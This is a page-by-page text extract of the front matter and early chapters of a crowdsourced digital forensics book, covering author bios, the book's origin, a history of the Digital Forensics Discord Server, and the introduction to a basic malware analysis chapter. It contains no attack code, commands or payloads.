. . . . . . . . . . . . . . . . . . . . . . . . . . 191 Closing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209 Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage . . . . . . . . . . . . . . . . . . . . 210 What is triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210 What should be included in a triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210 Forensic triage of one or a limited amount of hosts . . . . . . . . . . . . . . . . . . . . . . . . 211 Scaling up to a medium-sized subnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Scaling up to an entire network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Other tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Practicing triage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Contributions and sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
  • 7. CONTENTS Chapter 12 - Data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 Logical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217 Physical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218 How to approach a data recovery case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220 Imaging of unstable HDDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229 Flash drive data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245 Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285 Reporting Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285 Changelog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
  • 8. Authors Andrew Rathbun Andrew Rathbun is a DFIR professional with multiple years of experience in law enforcement and the private sector. Andrew currently works at Kroll as a Vice President in Cyber Risk. Andrew is involved in multiple community projects, including but not limited to the Digital Forensics Discord Server¹, AboutDFIR², and multiple GitHub repositories³. You can find him on the DFIR discord⁴. ApexPredator After many years at the top of the Systems Administration food chain, the ApexPredator switched to the Cybersecurity food chain. The ApexPredator is working to the top while possessing an MS in Cybersecurity and Information Assurance degree and numerous certifications, including OSCE3 (OSWE, OSEP, OSED), OSCP, OSWP, GREM, GXPN, GPEN, GWAPT, GSLC, GCIA, GCIH and GSEC. Always hunting for more prey, it spends free time playing with malware analysis and exploit development. Barry Grundy A U.S. Marine Corps veteran, Barry Grundy has been working in the field of digital forensics since the mid-1990s. Starting at the Ohio Attorney General’s office as a criminal investigator, and eventually joining U.S. Federal Law Enforcement as a digital forensics analyst and computer crimes investigator in 2001. He holds a Bachelor of Science in Forensic Science from Ohio University, and A Master’s Degree in Forensic Computing and Cybercrime Investigations from University College Dublin. Barry is the author and maintainer of the Law Enforcement and Forensic Examiner’s Introduction to Linux (LinuxLEO⁵). This practical beginner’s guide to Linux as a digital forensics platform has been available for over 20 years and has been used by a number of academic institutions and law enforcement agencies around the world to introduce students of DFIR to Linux. Teaching, particularly Linux forensics and open source DFIR tools, is his passion. ¹https://www.linkedin.com/company/digital-forensics-discord-server/ ²https://aboutdfir.com/ ³https://github.com/stars/AndrewRathbun/lists/my-projects ⁴http://discordapp.com/users/223211621185617920 ⁵https://linuxleo.com
  • 9. Authors 2 Guus Beckers A lifelong IT aficionado, Guus Beckers (1990), completed the Network Forensic Research track at Zuyd University of Applied Sciences as part of his Bachelor’s degree. In 2016, he attained his university Master’s degree at Maastricht University by completing the Forensics, Criminology and Law master’s program. Guus currently works as a security consultant at Secura, leading the forensic team and performing penetration testing. Jason Wilkins After serving in the US Navy for five years, Jason Wilkins began a career in firefighting and emergency medicine. While serving the community in that capacity for fourteen years he obtained associates degrees in criminal justice and computer networking from Iowa Central Community College online. He left the fire department in 2014 to pursue a network analyst position working for a global tire manufacturer. Disillusioned by a lack of mission and purpose, he returned to public safety in 2019 and began working as a crime & intelligence analyst for the local police department. It was there that he developed the agency’s first digital forensics lab and started the N00B2PR04N6 blog. In 2020 he was nominated as Newcomer of the Year in the Digital Forensics 4:Cast awards and has spoken at both the SANS Digital Forensics and Magnet Forensics Summits. He currently works as an overseas contractor teaching digital forensics and is also an adjunct instructor for digital forensics and incident response at Iowa Central Community College. John Haynes John Haynes works in law enforcement with a focus on digital forensics. John holds several digital forensics certs including Cellebrite Certified Mobile Examiner (CCME) and Magnet Certified Forensics Examiner (MCFE) and also holds the networking Cisco Certified Network Associate (CCNA) certification. Having only been active in digital forensics since 2020, his background as a curious nerd has served him well as he has just started exploring what digital forensics has to offer. John has taken a keen interest in password cracking after being introduced to the basics of Hashcat at the NCFI. This started the foundation for the password-cracking chapter in this book. You can find a few of his videos on password cracking on YouTube⁶ or find him learning what he can on the DFIR Discord⁷. Kevin Pagano Kevin Pagano is a digital forensics analyst, researcher, blogger and contributor to the open-source community. He holds a Bachelor of Science in Computer Forensics from Bloomsburg University ⁶https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg ⁷http://discordapp.com/users/167135713006059520
  • 10. Authors 3 of Pennsylvania and a Graduate Certificate in Digital Forensics from Champlain College. Kevin is a member of the GIAC Advisory Board and holds several industry certifications, including the GIAC Advanced Smartphone Forensics (GASF), GIAC Certified Forensic Examiner (GCFE), and GIAC Battlefield Forensics and Acquisition (GBFA), and the Certified Cellebrite Mobile Examiner (CCME) among others. Kevin is the creator of the Forensics StartMe⁸ page and regularly shares his research on his blog⁹. He is a published author with multiple peer-reviewed papers accepted through DFIR Review¹⁰. Kevin also contributes to multiple open-source projects, including but not limited to ALEAPP¹¹, iLEAPP¹², RLEAPP¹³, CLEAPP¹⁴ and KAPE¹⁵. Kevin is a regular competitor in the digital forensics CTF circuit. He has won First Place in the Magnet User Summit DFIR CTF 2019, the Magnet Virtual Summit DFIR CTF 2021, the Magnet User Summit DFIR CTF 2022, the Magnet Weekly CTF 2020, the Wi-Fighter Challenge v3 CTF, the Belkasoft Europe 2021 CTF, and the BloomCON CTF in 2017, 2019, 2021 and 2022. He additionally is a SANS DFIR NetWars Champion and NetWars Tournament of Champions winner and has earned multiple Lethal Forensicator coins. Kevin is a 4-time Hacking Exposed Computer Forensic (HECF) Blog Sunday Funday Winner. In his spare time, Kevin likes to drink beers and design DFIR-themed designs for stickers, clothing, and other swag. You can find him lurking on Twitter¹⁶ and on the DFIR Discord¹⁷. Nisarg Suthar Nisarg Suthar is a lifelong student and learner of DFIR. He is an aspiring digital forensic analyst with high levels of curiosity about how things work the way that they do. He has experience with malware analysis, reverse engineering, and forensics. Nisarg is an independent researcher, a blue teamer, CTF player, and a blogger¹⁸. He likes to read material in DFIR; old and new, complete investigations on platforms like CyberDefenders and BTLO, and network with other forensicators to learn and grow mutually. He is also the developer of his most recent open-source project Veritas¹⁹, a validation purpose hex viewer for the people in DFIR. He is a big fan of all things FOSS. Nisarg started tinkering with the disassembly of machine code, computer data, and reverse engineering when he came across the world of modding, emulation, and ROM hacking. Making his favorite games do what he wanted was a full-time hobby of writing code and stories. ⁸https://start.me/p/q6mw4Q/forensics ⁹https://www.stark4n6.com/ ¹⁰https://dfir.pubpub.org/user/kevin-pagano ¹¹https://github.com/abrignoni/ALEAPP ¹²https://github.com/abrignoni/iLEAPP ¹³https://github.com/abrignoni/RLEAPP ¹⁴https://github.com/markmckinnon/cLeapp ¹⁵https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape ¹⁶https://twitter.com/kevinpagano3 ¹⁷http://discordapp.com/users/597827073846935564 ¹⁸https://sutharnisarg.medium.com/ ¹⁹https://github.com/Nisarg12/Veritas
  • 11. Authors 4 In his spare time, Nisarg likes to play and learn chess obsessively. s3raph Breaker of things (mostly things that they shouldn’t break). Writer of broken code GitHub²⁰. s3raph has worked in DFIR, Threat Hunting, Penetration Testing, and Cyber Defense and still somehow has a job in this field. Do You Want to Know More?²¹ Tristram An avid blue team leader helping to secure the healthcare industry. Despite being blue team focused, Tristram brings the enemy mindset to the table through various offensive skillsets to identify gaps and validate existing controls. ²⁰https://github.com/s3raph-x00 ²¹https://www.s3raph.com/
  • 12. Contributors Thank You, • Holly Kennedy²² | Twitter²³ - For proofreading, editing, and making corrections! • Oaker Min²⁴ | Blog²⁵ | Twitter²⁶ - For helping with the dead link checker²⁷! • Klavdii²⁸ - For providing multiple²⁹ grammatical, spelling, and punctionation fixes as they were reading the book. • …and all other contributors³⁰ to the GitHub repository! Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors nor contributors will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book. ²²https://github.com/hollykennedy ²³https://twitter.com/hollykennedy4n6 ²⁴https://github.com/brootware ²⁵https://brootware.github.io/ ²⁶https://twitter.com/brootware/ ²⁷https://github.com/Digital-Forensics-Discord-Server/CrowdsourcedDFIRBook/issues/59 ²⁸https://github.com/lordicode ²⁹https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/pulls?q=is% 3Apr+author%3Alordicode+is%3Aclosed ³⁰https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/graphs/ contributors
  • 13. Chapter 0 - Introduction By Andrew Rathbun³¹ | Twitter³² | Discord³³ Welcome to the first crowdsourced digital forensics and incident response (DFIR) book! To my knowledge, this book is a first of its kind and hopefully not the last of its kind. To be very clear, this is not your traditional DFIR book. It’s also not meant to be, and that’s okay. I came up with the idea of the project, which ultimately became the book you are reading right now when I stumbled upon a website called Leanpub. Upon further research, I learned that books could be written on GitHub, a platform that has become a large part of my life since May 15. 2020 when I completed my first commit³⁴! As the Administrator of the Digital Forensics Discord Server, a community for which I am very fond and proud of, I felt combining the idea of writing a book with the members of the community that has given so much to me was a dream come true. This book is a grassroots effort from people who, to my knowledge, have no experience doing anything they’re about to do in the chapters that succeed this Introduction chapter, and that’s okay. This book isn’t perfect, and it doesn’t need to be. This book is documenting multiple people stepping outside of their shells, putting themselves out there, to share the knowledge they’ve gained through the lens they’ve been granted in their life with hopes to benefit the greater DFIR community. Additionally, I hope this book will inspire others to step outside their comfort zone and recognize that anyone can share knowledge, thus leaving the world a better place than what you found. Before getting into the chapters this book offers, I want to cover the mantra behind this book for the reader to consider as they make their way through. ³¹https://github.com/AndrewRathbun ³²https://twitter.com/bunsofwrath12 ³³http://discordapp.com/users/223211621185617920 ³⁴https://github.com/EricZimmerman/KapeFiles/commit/972774117b42e6fafbd06fd9b80d29e9f1ca629a
  • 14. Chapter 0 - Introduction 7 Purpose of This Book This book is purely a proof of concept that members of the Digital Forensics Discord Server undertook to show that a DFIR book can be: Crowdsourced I love collaborating with people. I enjoy it when I can find people with the same mindset who “get it” and all they want to do is move the ball forward on something greater than themselves. Everyone contributing to this book “gets it”, but that doesn’t mean if you’re reading this right now and haven’t contributed to it, you do not “get it”. I think it means you haven’t found something that’s resonated with you yet, or you’re just not at a point in your career or, more importantly, your life to where you’re able to give back through the various methods of giving back to the DFIR community, and that’s okay. Ultimately, this book is greater than the sum of its parts, and I’m thrilled to help provide the opportunity for myself and others to collaborate with other members of the Digital Forensics Discord Server to create something genuinely community-driven from idea to published book. Open source Since my first commit on GitHub in May 2020, I’ve been hooked on contributing to open-source projects. The ability for the community to see the process unfold from A-Z, including but not limited to the chapters being written, edited, and finalized for publication, is something I don’t think we’ve seen yet, and I hope we see more of once this book is published and freely available for anyone to consume. Self-published Self-publishing allows for as much control as possible for the content creators. Being able to self- publish on Leanpub enables the content creators to modify the content at a moment’s notice without the red tape involved when dealing with a publisher. As a result, this book can be updated at any time with additional content until the authors deem the book to be complete, and thus a sequel would be necessary.
  • 15. Chapter 0 - Introduction 8 Created using GitHub and Markua (modified version of Markdown) This goes along with the open-source above. GitHub is a fantastic platform by which to contribute to open source projects. Markdown is commonly used on GitHub and Leanpub utilized a Leanpub- flavored version of Markdown called Markua³⁵. Having gained a lot of experience with Markdown in my travels in various GitHub repos, the thought of authoring a book using Markdown was very appealing. Accessible This particular book will be freely available on Leanpub here³⁶. It will never cost you anything. Share it far and wide! Considering all the above, a legitimate DFIR resource Frankly, this may not be at the level of a college textbook, but it’s also not meant to be. Again, this project is intended to provide a platform for previously unknown contributors in the DFIR community to provide the knowledge they’ve gained through research, experience, or otherwise. When one is passionate enough about a subject to where they’d volunteer to write a chapter for a book like this, enabling that person to spread their wings and put themselves out there for others to benefit from is an honor. Any errata in the chapters of this book will be addressed as they are identified, and since we control the publishing tempo, we (or you) can update the book at any time. ³⁵http://markua.com/ ³⁶https://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
  • 16. Chapter 0 - Introduction 9 Community Participation One important aspect of creating this book was involving the community in deciding the book title³⁷ and the book cover³⁸. Book Title Originally, this book was called CrowdsourcedDFIRBook as a working title. Multiple polls on Google Forms³⁹ were created with the following results: Round 1 ³⁷https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/4 ³⁸https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/12 ³⁹https://www.google.com/forms
  • 17. Chapter 0 - Introduction 10 Round 2 Book Cover Originally, the book had no cover concept planned. As we got closer to the date of publishing the initial version of the book, we had discovered Canva⁴⁰ allowed us to work up respectable book cover candidates. Naturally, the book cover was put to a vote that would be decided by the community. The first voting round contained 17 book cover candidates created using Canva. Round 1 The following book covers were available as options during the first round of voting: ⁴⁰https://www.canva.com/
  • 18. Chapter 0 - Introduction 11 The final results for Round 1 were as follows:
  • 19. Chapter 0 - Introduction 12 Round 2 The following book covers were decided as the top three in Round 1: The final results for Round 2 were as follows: Therefore, the book cover was chosen by the community for a book that was made by the community and for the community.
  • 20. Chapter 0 - Introduction 13 Final Thoughts I don’t think any of the co-authors listed on the cover of this book ever thought they would be published authors. I can certainly say that is the case for myself. This project proved that the barrier to doing something as complicated as writing a book isn’t as complex as it could be, primarily thanks to Leanpub. For all we know, the next prominent name in the DFIR world may have gotten their start from volunteering a simple chapter to this book which sparked an interest in continuing the path of knowledge sharing, content development, and overall DFIR community betterment. Only time will tell! Either way, I’m proud of those who stepped up to do something uncomfortable, something that requires effort and follow-through, and something they can ultimately be proud of accomplishing when all is said and done. Ultimately, the authors win, the other contributors win, and most importantly, the community wins! Enjoy the book!
  • 21. Chapter 1 - History of the Digital Forensics Discord Server By Andrew Rathbun⁴¹ | Twitter⁴² | Discord⁴³ Special thanks to Kevin Pagano for creating the Digital Forensics Discord Server logo! Introduction I felt it was prudent to choose this topic for this project because very few others could provide as in-depth an account of the history of the Digital Forensics Discord Server. Having been a part of the server since day one and actively monitoring it every day since, I felt like this was something that needed to be immortalized before too much more time passes. As the server continues to grow and life forges on, much like a DVR or event log, memories are overwritten with more current memories. I very likely would not be able to write as detailed an account of this server’s history 5 years from now as I can today. If anything, documenting this history now creates a starting point to build upon over time. ⁴¹https://github.com/AndrewRathbun ⁴²https://twitter.com/bunsofwrath12 ⁴³http://discordapp.com/users/223211621185617920
  • 22. Chapter 1 - History of the Digital Forensics Discord Server 15 Beginnings in IRC Long before the Digital Forensics Discord Server came to be, there existed a channel on an IRC⁴⁴ network called freenode⁴⁵. The channel was called #mobileforensics. This channel had its humble beginnings on a Google Group run by Bob Elder of TeelTech⁴⁶, called the Physical and RAW Mobile Forensics Group⁴⁷, which still exists today. To gain access to this Google Group, one had to have attended a TeelTech training in the past. It was and continues to be a phenomenal resource for those in Law Enforcement trying to navigate the waters of mobile forensic acquisitions. In February 2016, I attended TeelTech’s JTAG/Chip-Off class taught by Mike Boettcher and gained an invite to the Physical and RAW Mobile Forensics Group. I actively participated in the group to the extent my knowledge and curiosity enabled me. Make no mistake, almost every other active poster in that group was more experienced or knowledgeable than I. I thought there was no better place or group of people to immerse myself in if I wanted to be the best version of myself. On August 23, 2016, a user by the name of tupperwarez informed the group that they were starting an IRC channel called #mobileforensics in an effort to “exchange ideas & have live discussions”. I have been using forums for all of my internet life up until this point, and I think subconsciously I was ready for something more. This was it! I also knew that IRC was a longstanding tradition, but I had never dabbled with it and only had previous experience with messaging clients such as AOL Instant Messenger (AIM)⁴⁸ and MSN Messenger⁴⁹ at the time. Thirteen minutes after the post by tupperwarez went out, I was the first to respond to the thread that I had joined. ⁴⁴https://en.wikipedia.org/wiki/Internet_Relay_Chat ⁴⁵https://en.wikipedia.org/wiki/Freenode ⁴⁶https://www.teeltech.com/ ⁴⁷https://groups.google.com/g/physical-mobile-forensics/about?pli=1 ⁴⁸https://en.wikipedia.org/wiki/AIM_(software) ⁴⁹https://en.wikipedia.org/wiki/Windows_Live_Messenger
  • 23. Chapter 1 - History of the Digital Forensics Discord Server 16 Throughout the next year and a half, a small contingent of 7-15 people occupied this IRC channel at any given time. We became a tight-knit group of examiners who relied on each other’s knowledge and expertise to navigate challenges in our everyday casework. These problems often would relate to performing advanced acquisition methods using Chip-Off, JTAG, or flasher boxes. The collaboration was exactly what I was looking for, because together we were able to cast a wider net when searching for the knowledge we needed to solve the problems we faced in our everyday investigations. I recall utilizing an application called HexChat⁵⁰ to access this IRC channel. I’d have HexChat open at all times along with my everyday workflow of software applications to perform my duties as a Detective. For those reading this who have not used IRC before, know that’s its nowhere near as feature rich as Discord. Discord is much more modern and IRC has been around since the early days of the internet as we know it today. I bring this up because often we needed to share pictures with each other as an exhibit for a problem we were encountering during the acquisition or decoding process of a mobile device. ⁵⁰https://hexchat.github.io/
  • 24. Chapter 1 - History of the Digital Forensics Discord Server 17 Move to Discord Truthfully, I had forgotten this detail I’m about to share, but one of our moderators’ reminder brought it all back to me. One of the main catalysts for moving from IRC was the fact that I was really annoyed with having to upload a picture to Imgur and share the link on the IRC channel. It seemed so inefficient and the process grew stale for me. I had created a Discord account back in September 2016 to join various special interest servers, so I had a fair amount of exposure to Discord’s capabilities prior to the birth of the Digital Forensics Discord Server on March 26th, 2018. I recall having aspirations for a move to Discord months prior to March 2018. For those who didn’t use Discord around this time, it was primarily a platform marketed towards gamers. Using it for things other than gaming wasn’t the intended purpose at the time, but the functionality it had was everything I wanted in a chat client. Take all of the good features from every other chat application I had used up until that point in time and add even more quality of life features and an awesome mobile application, and I was sold. Discord was a breath of fresh air. My call to move to Discord was met with nearly unanimous approval from members of the IRC channel. As a result, the Mobile Forensics Discord Server was created! Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server The Mobile Forensics Discord Server enjoyed great success and rapid growth throughout its first year of existence. The server’s growth was entirely driven by word of mouth and advertising on various Google Groups. The list of channels maintained in the server were driven by member requests which quickly expanded outside of mobile devices. Over time, it became increasingly apparent that branding the server as a Mobile Forensics server did not fully encompass the needs of the DFIR community. To the best of my research, the Mobile Forensics Discord Server was rebranded to the Digital Forensics Discord Server sometime around February 2019. Since then, multiple channels have been added, renamed, and removed at the request of members.
  • 25. Chapter 1 - History of the Digital Forensics Discord Server 18 Member Growth Throughout the 4 years (as of this writing), the Digital Forensics Discord Server has undergone substantial growth. Below are some major membership milestones mined from my messages in the #announcements channel over time. Major Milestones Date Member Count 3/26/2018 3 3/29/2018 116 4/3/2018 142 4/6/2018 171 4/11/2018 200 4/13/2018 250 5/30/2018 300 6/28/2018 375 7/9/2018 400 7/25/2018 450 8/20/2018 500 9/27/2018 600 11/16/2018 700 12/6/2018 800 1/10/2019 900 2/1/2019 1000 5/8/2019 1500 10/4/2019 2000 1/30/2020 2500 3/27/2020 3000 5/22/2020 4000 3/26/2021 6800 8/2/2021 8000 1/29/2022 9000 3/26/2022 9500 6/29/2022 10000
  • 26. Chapter 1 - History of the Digital Forensics Discord Server 19 Hosting the 2020 Magnet Virtual Summit In early 2020, shortly after the COVID-19 pandemic began, I was approached by representatives from Magnet Forensics inquiring about the possibility of providing a centralized location for attendees of the Magnet Virtual Summit 2020 to chat during presentations. Enthusiastically, we accepted the idea and began to plan the logistics of hosting what likely would become a large influx of members. I seem to recall nearly 1500 members joining during the month long Magnet Virtual Summit 2020. In retrospect, it’s clear that this was one of the first indicators that the server had “made it” in the eyes of the community. Not only was the 2020 Magnet Virtual Summit a massive success in many ways, but I also strongly feel its success influenced other conferences and entities to go virtual as well as to adopt Discord as the means of communication for attendees. For instance, the SANS 2020 DFIR Summit hosted a Discord server for their attendees a couple months after the 2020 Magnet Virtual Summit hosted on the Digital Forensics Discord Server. I would like to think of the 2020 Magnet Virtual Summit as a proof of concept for collaboration and communication among conference staff, presenters, and attendees that succeeded beyond our expectations and influenced how conferences were virtualized in 2020 and beyond. Community Engagement Within the Server One of the biggest divides that the Digital Forensics Discord Server was able to bridge was that between customers and vendors. I recall spending a lot of time emailing every vendor I knew of to provide representation in the server due to untapped potential in customer and vendor communications that simply didn’t exist at the time. Four years into the life of the server, representatives from multiple digital forensic software vendors are mainstays in their products’ channels, providing an unprecedented amount of instant feedback between the customer and the vendor. Historically, support was provided by email via a ticketing system, a vendor’s forum, or another means that lacked the instant feedback mechanism that Discord provides. Not only are customers able to interact directly with digital forensic software vendor employees who can provide meaningful answers to help move a case forward, but the vendors can also receive product feedback and observe interactions between examiners (their customers) and better understand how they can better serve those using their products. I have no possible way to quantify this statement, but I would like to think overall there has been a net positive influence on commonly utilized digital forensic software as a result of this direct interaction with the customer base within the Digital Forensic Discord Server’s channels.
  • 27. Chapter 1 - History of the Digital Forensics Discord Server 20 Impact on the DFIR community In this section, I want to share some unique stories from people who have joined the Digital Forensics Discord Server and what impact it has had on them. One of the earliest stories I can remember is from someone who identified themselves as a detective in Alaska. Specifically, this person stated they were a one-man digital forensics team at a police department in a remote part of Alaska. They did not have another tech-savvy person to run ideas past that was fewer than 3 hours away by car. Upon joining the Digital Forensics Discord Server, they said that the community provided exactly what they needed. Prior to joining the server, they were operating solo with no one to bounce ideas off when challenges arose in their investigations. When I was a detective, I always had at least 2 other people in my office to run ideas past or ensure I wasn’t forgetting something simple when I ran into roadblocks in my analyses. I can only imagine the feeling of isolation of having my closest support being over 3 hours away from me. The Digital Forensics Discord Server was a game changer because it provided something this person desperately needed: support! More recently, someone joined the server from country for which I had never expected to have to assign a Law Enforcement role. Someone posted in the #role-assignment channel stating they were a police officer in Iraq. In a prior life, I was in the United State Marine Corps. I had actually served a combat tour in Iraq in the infantry back in 2006-2007. Never in a million years would I have imagined that someone from Iraq serving in Law Enforcement would join the Digital Forensics Discord Server. To this day, this person is the only one occupying the Law Enforcement [Iraq] role, but when this person joined the server I felt I had come full-circle. I engaged in conversation with this individual and asked for updates on how the country was doing. It really warmed my heart, in all honesty. I met so many wonderful people in that country during my 7-month deployment. To think that the country is in a place to join the 73 other countries who have roles within the server put a smile on my face and still does to this day.
  • 28. Chapter 1 - History of the Digital Forensics Discord Server 21 Law Enforcement Personnel Being former Law Enforcement myself, I understand the importance of jurisdiction and how laws can differ from one jurisdiction to another. As a result, Law Enforcement roles were separated by country from the early stages of the server for the purpose of delineating members from each other due to various legal considerations that may vary from one jurisdiction to another. Because of that, enumerating a list of the countries that a Law Enforcement role has been created for is likely the best way to establish the reach the Digital Forensics Discord Server has in the global DFIR community. Countries with roles assigned for Law Enforcement personnel are listed below: As of November 2022: Albania Iran Peru Argentina Iraq Philippines Australia Ireland Poland Austria Israel Portugal Bangladesh Italy Romania Belgium Jamaica Royal Cayman Islands Bosnia Japan Russia Brazil Korea Senegal Canada Latvia Seychelles Chile Lithuania Singapore China Luxembourg Slovakia Columbia Malaysia Slovenia Croatia Maldives Spain Cyprus Malta Sweden Czech Republic Mauritius Switzerland Denmark Mexico Taiwan Dominican Republic Monaco Turkey Estonia Mongolia Ukraine Finland Myanmar United Arab Emirates France Nepal United Kingdom Germany Netherlands Uruguay Greece New Zealand USA Grenada Nigeria Vietnam Iceland Norway India Pakistan To save you from counting, that’s 73 countries with a dedicated Law Enforcement role. This means at least one person who has identified themselves as working in Law Enforcement in each of these countries has joined the server and had this role assigned to them. With 195 countries⁵¹ recognized in the world as of the writing of this book, the server has a reach into approximately 37% of those! ⁵¹https://www.worldatlas.com/articles/how-many-countries-are-in-the-world.html
  • 29. Chapter 1 - History of the Digital Forensics Discord Server 22 Forensic 4:cast Awards The Digital Forensics Discord Server was fortunate enough to enjoy success in the Forensic 4:cast Awards⁵², as seen below: Year Category Result 2020 Resource of the Year Winner⁵³ 2021 Resource of the Year Winner⁵⁴ 2022 Resource of the Year Winner⁵⁵ Future The Digital Forensics Discord Server will continue to live and thrive so long as the community wills it. I will always be active, but this server is and always has been far more than any single person. As long as the members of the DFIR community keep showing up and engaging with each other, the Digital Foreniscs Discord Server will never die…unless Discord ceases to exist, forcing the community to migrate to a different platform. Let’s hope that doesn’t happen anytime soon! All indications are that the server will continue to grow through coworker word-of-mouth, exposure through training courses, and university programs sharing invites to the server to students. The server has always been welcoming to all, from the high school student wanting to work in DFIR someday, to people who’ve been involved in DFIR for decades, and everyone in between. This will not ever change. Administrator Contingency Plan This server has become such an important part of my life (and the DFIR community) that I’ve created a contingency plan. For those who are new to administering Discord servers, one important thing to know is that only the member who is assigned as the Server Owner can delete the server. Currently, that person is me, Andrew Rathbun. In the interest of ensuring the Digital Forensics Discord Server lives far beyond all of us (assuming Discord is still around by that time), I’ve established a paper trail for any other moderators to follow should anything happen to me and render me unable to log back in to Discord. This paper trail will require a lot of effort and coordination with family members/friends of mine to access my password vault and many other necessary items in order to Transfer Ownership⁵⁶ so that the server can live on without any administrative hiccups. In the unfortunate event that I can no longer log back into Discord, a OneNote page has been shared with other moderators providing breadcrumbs to obtain the necessary information to transfer ownership to another moderator so the server can be properly taken care of. ⁵²https://forensic4cast.com/forensic-4cast-awards/ ⁵³https://forensic4cast.com/forensic-4cast-awards/2020-forensic-4cast-awards/ ⁵⁴https://forensic4cast.com/forensic-4cast-awards/2021-forensic-4cast-awards/ ⁵⁵LinkTBD ⁵⁶https://support.discord.com/hc/en-us/articles/216273938-How-do-I-transfer-server-ownership
  • 30. Chapter 1 - History of the Digital Forensics Discord Server 23 Conclusion Thank you to everyone who has helped this server become such an integral part of the DFIR community.
  • 31. Chapter 2 - Basic Malware Analysis By ApexPredator⁵⁷ | Discord⁵⁸ Introduction Malware has been around for as long as computers have been in common use. Any computer program that performs malicious activities is classified as malware. There are many types of malware ranging from sophisticated self-propagating worms, destructive logic bombs, ransomware, to harmless pranks. Everyone who regularly uses a computer will encounter malware at some point. This chapter will cover the basics of analyzing malware on an infected computer. It is targeted towards beginners who are new to Digital Forensics and Incident Response (DFIR) and hobbyists. The goal of this chapter is to teach someone unfamiliar with the basic concepts of malware analysis some Tactics, Techniques, and Procedures (TTPs) used to confirm that a computer is infected with malware and how to begin extracting Indicators of Compromise (IOCs). It will cover the use of basic tools. We will not cover intermediate or advanced topics such as reverse engineering malware to discover its purpose or how it works in this chapter. The chapter starts with an introduction to basic malware analysis. It then covers some free tools to use in basic malware analysis. The chapter culminates with a walkthrough of a canned analysis on a piece of malware. The walkthrough wraps up with recommendations on where to go next to progress to intermediate or advanced malware analysis. I had numerous instances of friends and family asking me to figure out why their computer was acting weird long before moving in to cybersecurity and receiving formal training on malware analysis. I have had other cybersecurity professionals ask why it is not a waste of time to learn to build Microsoft Office macro-based payloads when Microsoft is making it harder for users to run the malicious code inside to which I always respond with “Never underestimate the users desire and ability to download and run anything sent to them.” People are going to download and execute malware at some point and if you are the IT expert they will ask you to figure out what happened. ⁵⁷https://github.com/ApexPredator-InfoSec ⁵⁸http://discordapp.com/users/826227582202675210
